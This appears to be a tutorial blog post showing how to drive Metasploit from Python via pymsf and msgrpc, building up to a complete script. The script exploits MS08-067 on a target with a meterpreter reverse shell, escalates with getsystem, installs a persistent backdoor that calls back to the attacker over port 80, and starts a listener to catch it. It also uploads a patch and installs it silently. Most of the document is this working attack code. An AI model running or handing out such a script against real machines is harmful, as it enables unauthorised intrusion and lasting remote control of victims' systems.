## Metasploit from Python

pymsf is a Python module written by Spiderlabs for talking to Metasploit over msgrpc. Before using it you have to start the msgrpc service inside msfconsole:

```
load msgrpc Pass=<password>
```

Talking to msgrpc is really talking to msfconsole. You first create an `Msfrpc` object, log in to the msgrpc server and create a virtual console; you can then execute a string containing several commands on that console. Commands are sent to the console with `console.write`, and whatever the console prints is read back with `console.read`. This article shows how to use the pymsf module and how to build a complete script from it.

Here is a function that creates an `Msfrpc` instance, logs in to the msgrpc server and creates a virtual console. The username and password passed to `login` must match the user and `Pass=` value the msgrpc service was loaded with:

```
import msfrpc

def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')          # msgrpc user and the Pass= value given to 'load msgrpc'
    ress = client.call('console.create')
    console_id = ress['id']
```

The next step is to hand a string of several commands to the virtual console, writing it with `console.write` and reading the console's output back with `console.read`:

```
    ## Exploit MS08-067 ##
    commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
    print("[+] Exploiting MS08-067 on: "+RHOST)
    client.call('console.write',[console_id,commands])
    res = client.call('console.read',[console_id])   # one read; the exploit may still be running
    result = res['data'].split('\n')
```

The next snippet writes an MSF resource file, so that a series of commands can be executed from a file with the `resource <PathToFile>` command. The commands escalate privileges with `getsystem`, install a persistent backdoor that calls back over port 80, upload our patch for the vulnerability together with a small .bat wrapper, and install the patch silently from the command line:

```
# This function writes the MSF .rc file and the .bat installer it uploads
def builder(RHOST, LHOST, LPORT):
    post = open('/tmp/smbpost.rc', 'w')
    bat = open('/tmp/ms08067_install.bat', 'w')
    postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
    batcomm = "ms08067_patch.exe /quiet"
    post.write(postcomms); bat.write(batcomm)
    post.close(); bat.close()
```

The code above creates the .rc file. The Metasploit module `post/multi/gather/run_console_rc_file` then runs that file inside the meterpreter session whose number is passed on the command line with `-s` (the script does not parse the session number out of the console output). Again the commands are written to the virtual console with `console.write` and the output is read back with `console.read`. Finally a handler is started on port 80 to catch the persistent backdoor's callback:

```
    ## Run Post-exploit script ##
    runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
    print("[+] Running post-exploit script on: "+RHOST)
    client.call('console.write',[console_id,runPost])
    rres = client.call('console.read',[console_id])

    ## Setup Listener for persistent connection back over port 80 ##
    sleep(10)
    listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
    print("[+] Setting up listener on: "+LHOST+":80")
    client.call('console.write',[console_id,listen])
    lres = client.call('console.read',[console_id])
    print(lres)
```

The variables used above (RHOST, LHOST, LPORT and so on) are read from the command line with the optparse module. The complete script is hosted on GitHub. Keep in mind that all paths in the script are static: the files it generates go to /tmp/, and the MS08-067 patch is expected to already be at /tmp/ms08067_patch.exe. Once the basics are clear, a few changes to the code below give you your own Metasploit automation script; we suggest starting from the simple examples published on this blog and then writing your own:

```
import msfrpc, optparse, sys
from time import sleep

# Function to create the MSF .rc file and the .bat installer
def builder(RHOST, LHOST, LPORT):
    post = open('/tmp/smbpost.rc', 'w')
    bat = open('/tmp/ms08067_install.bat', 'w')
    postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
    batcomm = "ms08067_patch.exe /quiet"
    post.write(postcomms); bat.write(batcomm)
    post.close(); bat.close()

# Exploits MS08-067, runs the rc file to set up persistence and patch the host
def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')          # must match the msgrpc user and Pass=
    ress = client.call('console.create')
    console_id = ress['id']

    ## Exploit MS08-067 ##
    commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
    print("[+] Exploiting MS08-067 on: "+RHOST)
    client.call('console.write',[console_id,commands])
    res = client.call('console.read',[console_id])
    result = res['data'].split('\n')

    ## Run Post-exploit script ##
    runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
    print("[+] Running post-exploit script on: "+RHOST)
    client.call('console.write',[console_id,runPost])
    rres = client.call('console.read',[console_id])

    ## Setup Listener for persistent connection back over port 80 ##
    sleep(10)
    listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
    print("[+] Setting up listener on: "+LHOST+":80")
    client.call('console.write',[console_id,listen])
    lres = client.call('console.read',[console_id])
    print(lres)

def main():
    parser = optparse.OptionParser(sys.argv[0] +\
        ' -p LPORT -r RHOST -l LHOST -s SESSION')
    parser.add_option('-p', dest='LPORT', type='string', \
        help ='specify a port to listen on')
    parser.add_option('-r', dest='RHOST', type='string', \
        help='Specify a remote host')
    parser.add_option('-l', dest='LHOST', type='string', \
        help='Specify a local host')
    parser.add_option('-s', dest='session', type='string', \
        help ='specify session ID')
    (options, args) = parser.parse_args()
    session=options.session
    RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
    # all four options are required: every one of them is concatenated into
    # a console command string, so a missing value cannot be tolerated
    if (RHOST is None) or (LPORT is None) or (LHOST is None) or (session is None):
        print(parser.usage)
        sys.exit(0)
    builder(RHOST, LHOST, LPORT)
    sploiter(RHOST, LHOST, LPORT, session)

if __name__ == "__main__":
    main()
```